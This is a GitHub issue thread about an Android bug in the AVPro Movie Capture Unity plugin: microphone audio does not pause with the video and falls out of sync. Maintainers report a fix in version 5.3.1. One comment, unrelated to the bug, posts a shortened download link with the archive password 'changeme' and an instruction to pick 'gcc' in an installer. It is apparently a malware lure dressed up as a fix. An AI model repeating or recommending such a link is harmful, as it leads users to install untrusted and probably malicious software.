### ISSUE TITLE
[Bug] Audio recording from microphone out of sync after pause

### ISSUE THREAD

**Issue by spebern** [RenderHeads/UnityPlugin-AVProMovieCapture#422]
### Unity Version

2022.3.19f1

### AVPro Movie Capture Version

v5.3.0-Trial, AVPro Movie Capture - Ultra Edition v5.3.0

### Which platform(s) are you using?

Android

### Which OS version(s) are you using?

Android 13

### Hardware

Tab M10 Plus Gen 3

### Which capture component are you using?

Capture From WebCamTexture

### Capture mode

Realtime

### Which output mode are you using?

Video file

### Video codecs

H264

### Audio source

Microphone

### Audio codecs

AAC

### The issue

Pausing the video recording on android does not pause the audio recording. This results in delayed audio after resume. Video and audio are out of sync.

I used the `Demo02-WebcamCapture` scene.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by spebern** [comment]
There appears to be a related issue #204, but we still seem to have that issue. In the logs we can also see:
![image](https://github.com/user-attachments/assets/83510e64-1f6d-4407-944f-5990b7d3cadd)

**Comment by MorrisRH** [comment]
We've implemented a work around so that devices where the codec doesn't support pausing the stream behave correctly.
This will make it into the next release (version 5.3.1).

**Comment by Chris-RH** [comment]
This has been fixed in AVPro Movie Capture version 5.3.1.  Please let us know if your issue is not resolved.
